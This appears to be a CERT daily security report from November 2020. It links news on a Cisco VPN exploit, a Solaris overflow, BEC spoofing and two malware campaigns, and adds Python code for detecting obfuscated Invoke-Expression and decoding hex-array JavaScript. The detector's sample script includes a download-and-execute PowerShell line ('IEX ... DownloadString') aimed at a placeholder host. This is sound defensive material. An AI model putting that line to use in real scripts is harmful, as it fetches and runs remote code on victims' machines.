Daily summary - 05.11.2020

End-of-Day report

Timeframe: Wednesday 04-11-2020 18:00 - Thursday 05-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter

News

Exploit for Cisco AnyConnect VPN in circulation - security update still pending

Attacks on Cisco's VPN solution AnyConnect could be imminent. So far there are only patches for other vulnerabilities in IOS XR, Webex & Co.

https://heise.de/-4948798


Attacks on industrial enterprises using RMS and TeamViewer: new data

In summer 2019, Kaspersky ICS CERT identified a new wave of phishing emails containing various malicious attachments. The emails target companies and organizations from different sectors of the economy that are associated with industrial production in one way or another.

https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer-new-data/99206/


Did You Spot "Invoke-Expression"?, (Thu, Nov 5th)

When a PowerShell script is obfuscated, the deobfuscation process is, most of the time, performed through the Invoke-Expression cmdlet[1]. Invoke-Expression evaluates the string passed as an argument and returns the results of the commands inside the string.

https://isc.sans.edu/diary/rss/26762
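
Invoke-Expression is easy to grep for when it appears literally, but obfuscated scripts routinely split the name with backticks (i`e`x), build it from concatenated string fragments (&('Inv'+'oke-Expr'+'ession')), or use the built-in IEX alias. The following is an added example, not code from the ISC diary: a small Python detector that undoes those two cheap tricks before searching, run over a constructed sample script (the URL, variable names and base64 placeholder are made up for the demonstration).

```python
import re
from typing import List, Tuple

# After normalisation we only need to look for the cmdlet name and its built-in alias.
IEX_PATTERN = re.compile(r"\b(invoke-expression|iex)\b", re.IGNORECASE)

# One step of 'a'+'b' (or "a"+"b") -> 'ab'; applied repeatedly to fold longer chains.
CONCAT_PATTERN = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def normalise(line: str) -> str:
    """Undo the two cheapest PowerShell tricks that hide a cmdlet name from grep.

    1. Backtick splitting: i`e`x -> iex. The backtick is PowerShell's escape
       character; dropping all of them is acceptable here because we only
       search the text for names, we never execute it.
    2. String concatenation: ('Inv'+'oke-Expr'+'ession') -> ('Invoke-Expression').
    """
    line = line.replace("`", "")
    while True:
        joined = CONCAT_PATTERN.sub(lambda m: f"'{m.group(2)}{m.group(4)}'", line)
        if joined == line:
            return line
        line = joined


def find_iex(script: str) -> List[Tuple[int, str]]:
    """Return (line_number, matched_token) for every Invoke-Expression / IEX hit."""
    hits: List[Tuple[int, str]] = []
    for no, raw in enumerate(script.splitlines(), start=1):
        for m in IEX_PATTERN.finditer(normalise(raw)):
            hits.append((no, m.group(0)))
    return hits


# Constructed sample (not real malware): typical dropper lines, each hiding IEX differently.
SAMPLE_SCRIPT = "\n".join([
    "$u = 'http://example.invalid/stage2.ps1'",                                   # 1: no IEX
    "IEX (New-Object Net.WebClient).DownloadString($u)",                          # 2: plain alias
    "i`e`x $payload",                                                            # 3: backtick split
    "&('Inv'+'oke-Expr'+'ession') $decoded",                                      # 4: concatenated name
    ".( 'I'+'EX' ) $x",                                                           # 5: concatenated alias
    "$s = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)); Invoke-Expression $s",  # 6
    'Write-Host "Index: $i"',                                                     # 7: "Index" must not match
])

if __name__ == "__main__":
    for lineno, token in find_iex(SAMPLE_SCRIPT):
        print(f"line {lineno}: {token}")
```

The word boundary in IEX_PATTERN keeps identifiers such as "Index" from matching, and because the detector works on normalised copies of each line, the original script is left untouched for further analysis. It will still miss forms that never spell the name at all (for example reflection through $ExecutionContext or [scriptblock]::Create), which is why PowerShell ScriptBlock logging, which records the de-obfuscated code at execution time, remains the more reliable source.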


Legacy Mauthtoken Malware Continues to Redirect Mobile Users

During malware analysis, we regularly find variations of this injected script on various compromised websites: [...] The variable _0x446d assigns hex encoded strings in different positions in the array. If we get the ASCII representation of the variable, we'll end up with the following code: [...]

https://blog.sucuri.net/2020/11/legacy-mauthtoken-malware-continues-to-redirect-mobile-users.html
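
The array-of-hex-strings pattern described above is mechanical to undo: decode each "\xHH" escape in the array literal, then substitute every _0x446d[n] reference with the decoded string. The following is an added example, not code from the Sucuri post: a small Python deobfuscator run over a constructed snippet that imitates the pattern (the string contents, cookie name and surrounding code are illustrative, not the actual injected script).

```python
import json
import re
from typing import List, Tuple

# Constructed sample imitating the obfuscation pattern: a hex-escaped string array
# followed by code that only ever references the array by index.
SAMPLE_JS = (
    'var _0x446d=["\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E",'
    '"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66","\\x63\\x6F\\x6F\\x6B\\x69\\x65"];'
    'if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==-1){/* redirect */}'
)

# var _0x<hex> = [ ... ];
ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];')
# One double-quoted JS string literal, backslash escapes kept as-is for now.
STRING_RE = re.compile(r'"((?:\\.|[^"\\])*)"')
# \xHH and \uHHHH escapes.
ESC_RE = re.compile(r'\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})')


def decode_js_escapes(s: str) -> str:
    """Turn \\xHH / \\uHHHH escapes into the characters they encode."""
    return ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_string_array(js: str) -> Tuple[str, List[str]]:
    """Return (array_name, decoded_strings) for the first _0x... array in the source."""
    m = ARRAY_RE.search(js)
    if m is None:
        raise ValueError("no hex string array found")
    name, body = m.group(1), m.group(2)
    return name, [decode_js_escapes(raw) for raw in STRING_RE.findall(body)]


def deobfuscate(js: str) -> str:
    """Inline the decoded strings and rewrite obj["prop"] as obj.prop for readability."""
    name, strings = decode_string_array(js)
    rest = js[ARRAY_RE.search(js).end():]          # drop the array declaration itself
    ref = re.compile(re.escape(name) + r'\[(\d+)\]')
    inlined = ref.sub(lambda m: json.dumps(strings[int(m.group(1))]), rest)
    # obj["ident"] -> obj.ident when the key is a plain identifier
    return re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r'.\1', inlined)


if __name__ == "__main__":
    print(decode_string_array(SAMPLE_JS))
    print(deobfuscate(SAMPLE_JS))
```

The decoded strings alone already tell an analyst what the script touches (here document.cookie and an indexOf check), which is usually enough to write a content signature on the decoded values rather than on the ever-changing hex array.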


BEC Scammers Exploit Flaw to Spoof Domains of Rackspace Customers

A threat actor specializing in business email compromise (BEC) attacks has been observed exploiting a vulnerability to spoof the domains of Rackspace customers as part of its operations.

https://www.securityweek.com/bec-scammers-exploit-flaw-spoof-domains-rackspace-customers

Vulnerabilities

Security updates: BIG-IP appliances and the admin trap

Network equipment vendor F5 has released important patches to secure various appliances.

https://heise.de/-4949448


Security updates for Thursday

Security updates have been issued by Debian (bouncycastle, gdm3, and libonig), Fedora (arpwatch, thunderbird, and trousers), openSUSE (chromium, gn), Red Hat (freetype, libX11, thunderbird, and xorg-x11-server), and SUSE (ImageMagick, java-11-openjdk, salt, and wireshark).

https://lwn.net/Articles/836238/


In Wild Critical Buffer Overflow Vulnerability in Solaris Can Allow Remote Takeover - CVE-2020-14871

FireEye Mandiant has been investigating compromised Oracle Solaris machines in customer environments. During our investigations, we discovered an exploit tool on a customer's system and analyzed it to see how it was attacking their Solaris environment. The FLARE team's Offensive Task Force analyzed the exploit to determine how it worked, reproduced the vulnerability on different versions of Solaris, and then reported it to Oracle. In this blog post we present a description of the [...]

https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html